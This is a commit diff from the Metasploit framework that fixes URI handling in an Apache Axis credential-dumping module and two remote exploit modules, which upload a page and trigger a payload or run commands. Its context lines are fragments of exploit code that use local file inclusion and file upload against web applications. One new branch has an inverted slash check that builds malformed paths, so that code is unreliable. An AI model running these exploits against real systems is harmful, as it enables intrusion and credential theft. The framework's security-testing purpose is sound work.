Various and sundry fixes for normalize_uri

bug/bundler_fix
Tod Beardsley 2013-01-07 12:02:08 -06:00
parent 6a9445966a
commit 36adf86184
3 changed files with 24 additions and 8 deletions

View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
get_credentials(new_uri) get_credentials(new_uri)
else else
print_status("#{uri} - Apache Axis - The remote page not accessible") print_status("#{target_url} - Apache Axis - The remote page not accessible")
return return
end end
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "#{uri}" + lfi_payload, 'uri' => "#{uri}" + lfi_payload,
}, 25) }, 25)
print_status("#{uri} - Apache Axis - Dumping administrative credentials") print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
if (res and res.code == 200) if (res and res.code == 200)
if res.body.to_s.match(/axisconfig/) if res.body.to_s.match(/axisconfig/)

View File

@ -65,7 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
def check def check
uri = normalize_uri(datastore['URI']) uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/' if uri[-1,1] != '/'
uri = uri + "index.php"
else
uri = uri + "/index.php"
end
res = send_request_raw({ res = send_request_raw({
'uri' => uri 'uri' => uri
@ -88,7 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote
def retrieve_session(user, pass) def retrieve_session(user, pass)
uri = normalize_uri(datastore['URI']) uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/' if uri[-1,1] == "/"
uri = uri + "login.php"
else
uri = uri + "/login.php"
end
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
@ -114,7 +122,11 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_page(session, newpage, contents) def upload_page(session, newpage, contents)
uri = normalize_uri(datastore['URI']) uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/' if uri[-1,1] == "/"
uri = uri + "ftp_upload_file.php"
else
uri = uri + "/ftp_upload_file.php"
end
boundary = rand_text_alphanumeric(6) boundary = rand_text_alphanumeric(6)
@ -176,7 +188,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Calling payload: #{cmdpath}") print_status("Calling payload: #{cmdpath}")
uri = normalize_uri(datastore['URI']) uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/' if uri[-1,1] == "/"
uri = uri + cmdpath
else
uri = uri + "/#{cmdpath}"
end
send_request_raw({ send_request_raw({
'uri' => uri 'uri' => uri

View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
uri =normalize_uri(datastore['URI']) uri = normalize_uri(datastore['URI'])
uri = Rex::Text::uri_encode(uri) uri = Rex::Text::uri_encode(uri)
var_a = rand_text_alpha_lower(4) var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(2) var_b = rand_text_alpha_lower(2)